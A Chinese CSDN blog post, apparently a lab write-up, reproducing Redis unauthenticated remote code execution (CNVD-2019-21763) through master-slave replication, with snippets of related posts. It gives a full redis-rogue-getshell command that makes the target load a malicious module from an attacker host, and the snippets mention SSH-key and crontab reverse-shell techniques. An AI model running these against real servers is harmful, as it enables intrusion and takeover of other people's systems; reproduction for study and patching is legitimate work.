Redis未授权访问-CNVD-2019-21763复现

梧六柒

已于 2023-11-25 22:16:50 修改

阅读量357

点赞数

分类专栏：网络安全文章标签： web安全

于 2023-11-25 22:15:41 首次发布

本文链接：https://blog.csdn.net/XXokok/article/details/134621325

版权

网络安全专栏收录该内容

35 篇文章 2 订阅

订阅专栏

Redis未授权访问-CNVD-2019-21763复现

利用项目： https://github.com/vulhub/redis-rogue-getshell

解压后先进入到 RedisModulesSDK目录里面的exp目录下，make编译一下才会产生exp.so文件，后面再利用这个exp.so文件进行远程代码执行

需要python3环境

# 利用命令，命令中的攻击IP要用公网IP
python3 redis-master.py -r 目标IP -p 目标端口 -L 攻击IP -P 8888 -f RedisModulesSDK/exp/exp.so -c "id"

进入到exp目录下make一下

来到 redis-master.py文件所属目录下执行命令，查看id

命令执行成功

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

梧六柒

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Redis未授权访问-CNVD-2019-21763复现

Redis未授权访问-CNVD-2019-21763复现
复制链接

扫一扫

专栏目录

redis 未授权访问 (CNVD-2019-21763)

qq_32445755的博客

10-03

904

近日，Redis 被爆出Redis 4.x/5.x 版本存在主从同步命令执行漏洞，攻击者通过构造特定的请求实现漏洞利用，成功利用漏洞可在目标服务器上实现Getshell，风险较高。目前漏洞的利用方式已被公开。CNVD-2015-07557也可以复现。

关于Redis未授权访问漏洞利用的介绍与修复建议

01-21

Redis 默认情况下，会绑定在 0.0.0.0:6379，这样将会将 Redis 服务暴露到公网上，如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未...

参与评论您还未登录，请先登录后发表或查看评论

Redis未授权访问漏洞复现 CNVD-2019-21763 & CNVD-2015-07557

最新发布

MateSnake的博客

05-17

1347

Redis未授权访问漏洞复现 CNVD-2019-21763 & CNVD-2015-07557

【Vulfocus漏洞复现】redis-cnvd_2019_21763、redis-cnvd_2015_07557

weixin_45632448的博客

04-02

3849

vps：腾讯云 centos8 本地：windows11 靶场环境：http://123.58.236.76:47109/ 在vps上执行以下命令 git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand cd RedisModules-ExecuteCommand/ make 编译之后继续执行命令 git clone https://github.com/Ridter/redis-rce.git cd redis-rce/

VULFOCUS-redis未授权访问（CNVD-2019-21763 ）

HAKUNAMATATATTA的博客

11-30

2406

redis未授权访问，主从复制RCE

redis未授权访问(cnvd_2019_21763)

qq_14902381的博客

08-12

2387

redis未授权访问漏洞，(cnvd_2019_21763)

redis漏洞修复：(CNVD-2019-21763）

大新新大浩浩的博客

09-22

898

redis漏洞修复：(CNVD-2019-21763） docker形式运行的redis的防火墙规则配置

redis-desktop-manager-2019.4.0.exe

09-12

redis-desktop-manager-2019.4.0.exe

redis-desktop-manager-2019.0.0

05-08

在实际使用中，`redis-desktop-manager-2019.0.0.exe`这个文件是Windows平台的可执行文件，用户只需双击运行，即可启动Redis Desktop Manager。需要注意的是，为了确保软件能够正常运行，用户的计算机上需要事先安装...

redis-stack-server 7.2.0 安装包合集

04-03

redis-stack-server-7.2.0-v9.arm64.snap redis-stack-server-7.2.0-v9.bionic.arm64.tar.gz redis-stack-server-7.2.0-v9.bionic.x86_64.tar.gz redis-stack-server-7.2.0-v9.bullseye.x86_64.tar.gz redis-stack-...

redis2-nginx-module-0.15

07-18

- **权限控制**：确保 Redis 服务器的安全配置，限制访问来源和操作权限。 - **监控与报警**：定期监控 Redis 和 NGINX 的运行状态，及时发现并处理问题。 - **备份与恢复**：定期备份 Redis 数据，以防数据丢失...

redis未授权访问利用汇总

今天是几号的博客

03-17

1209

原理就是在数据库中插入一条数据，将本机的公钥作为value，key值随意，然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys，把缓冲的数据保存在文件里，这样就可以在服务器端的/root/.ssh下生成一个授权的key。/var/spool/cron/ 这个目录下存放的是每个用户包括root的crontab任务，每个任务以创建者的名字命名，比如tom建的crontab任务对应的文件就是/var/spool/cron/tom。

Redis未授权访问

weixin_63960760的博客

08-29

1042

redis默认情况下，会绑定在0.0.0.0:6379,如果没有采用相关的策略，比如添加防火墙规则避免其他非信任来源ip访问等，这样将会将Redis服务暴露在公网上，如果在没有设置密码认证的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。

Redis漏洞总结--未授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543)

weixin_74985952的博客

09-22

810

由于在Reids 4.x及以上版本中新增了模块功能，攻击者可通过外部拓展，在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块，在未授权访问的情况下使被攻击服务器加载恶意.so 文件，从而实现远程代码执行。对于Redis服务的未授权访问，首先需要确认Redis未授权是否存在，使用Redis数据库客户端进行连接测试，如何没有密码，即未授权漏洞存在。漏洞利用有三种利用方式，每种方式都有限制条件，本质就是使用Redis数据库操作语句在目标主机进行写入文件。注意：部分没目录权限读写权限。

Redis漏洞利用总结

YouthBelief的博客

10-29

6190

redis漏洞利用前言一、redis4.x`5.x未授权访问漏洞0x01 漏洞描述0x02 影响范围0x03 环境搭建0x03 漏洞利用探测漏洞未授权登录3.1 利用redis写webshell利用前提利用方法3.2 利用“公私钥” 认证获取root权限3.3 利用crontab反弹shell0x04 漏洞修复前言 redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。Redis默认使用 6379 端口。一、redis4

Redis未授权访问漏洞

m0_64769218的博客

09-24

327

Redis 是非关系型数据库系统，没有库表列的逻辑结构，仅仅以键值对的方式存储数据。Redis 数据库经常用于Web 应用的缓存。Redis 可以与文件系统进行交互。Redis 监听TCP/6379。

Redis远程命令执行漏洞修复方法（CNVD-2019-21763）

zhangyuxun3的博客

03-30

3313

漏洞详情：近日，Redis 被爆出Redis 4.x/5.x 版本存在主从同步命令执行漏洞，攻击者通过构造特定的请求实现漏洞利用，成功利用漏洞可在目标服务器上实现Getshell，风险较高。目前漏洞的利用方式已被公开。漏洞评级：高危漏洞影响范围： Redis版本 >=4.0、>=5.0 漏洞复现安装最新版 redis （5.0.5）并正常启动：在攻击机上执行EXP，同时可以看到服务器上的日志输出：成功后可以执行任意命令：修复方案（由于目前Redis厂商未发布正式版本的修复